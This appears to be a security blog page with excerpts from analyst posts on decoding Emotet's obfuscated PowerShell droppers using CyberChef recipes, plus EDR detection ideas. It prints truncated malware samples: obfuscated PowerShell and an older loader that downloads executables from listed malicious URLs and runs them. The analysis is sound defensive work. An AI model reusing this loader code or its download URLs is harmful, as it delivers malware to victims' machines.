Security Magic

Some of the latest samples I've been seeing for Emotet look like the this  app.any.run report. Using CyberChef , we can decode the powershell from this sample to extract the download links for the malware From_Base64('A-Za-z0-9+/=',true) Remove_null_bytes() Find_/_Replace({'option':'Regex','string':'[`\'+()]'},'',true,false,true,false) Find_/_Replace({'option':'Regex','string':'\\]e1r\\[S'},'http',true,false,true,false) Extract_URLs(false) Find_/_Replace({'option':'Simple string','string':'@'},'\\r',true,false,true,false) > Of course some of the "replace strings" will vary, so this recipe will have to be changed in certain places at times. Some other additional items to look at, from an EDR perspective might be: Rule 1: ParentProcess contains Rundll32.exe AND process contains Rundll32.exe AND ProcessPa...

I love taking the time to de-obfuscate newly observed scripts, and Emotet gives me plenty of opportunity to do this. As I posted last month, there are a number of ways to decode these, and I could just simply run these through a sandbox, but I like to really understand the obfuscation for my self.  Which is why I take the time to reverse it a little bit, and to share how I go about it. I will say that since I started using Cyber Chef , it almost feels like cheating in a way. I had a python script that I kept updating to look for signs of known emotet encodings that I've observed and then decode them. I was up to version 8 of my script, I still write this stuff to keep in practice, but I find Cyber Chef to be a much faster method for "writing" a decoder of sorts. So, the new variant I had observed looks like this: powershell ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( '[R]VDbagIxEP2VfQhEsZv0oVAwLA...

Nothing earth shattering to report here, I just wanted to share the latest Emotet encoded powershell command and one simple way to decode it to extract the Stage 2 download links. I know, a lot of these obfuscated powershells can be easily decoded by simply using the write-host command, however, I do like to try different ways to reverse the obfuscation, as I think it just makes for a good analyst exercise. The powershell command is encoded as: POwerSHell ieX("$(sV 'ofs' '' )" +[STrInG]( '15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68...

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before, an emial phish with a link, the link downloads a malicious document. The document, usually a malicious word document, uses VBA to build and execute a powershell command which then will download the next stage of infection. This used to be very simple to see, for example, older observed variants produced the following powershell: powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Ex...